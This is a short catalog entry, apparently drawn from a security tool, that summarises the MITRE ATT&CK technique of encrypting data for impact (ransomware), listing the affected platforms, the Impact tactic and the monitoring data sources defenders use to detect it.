Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre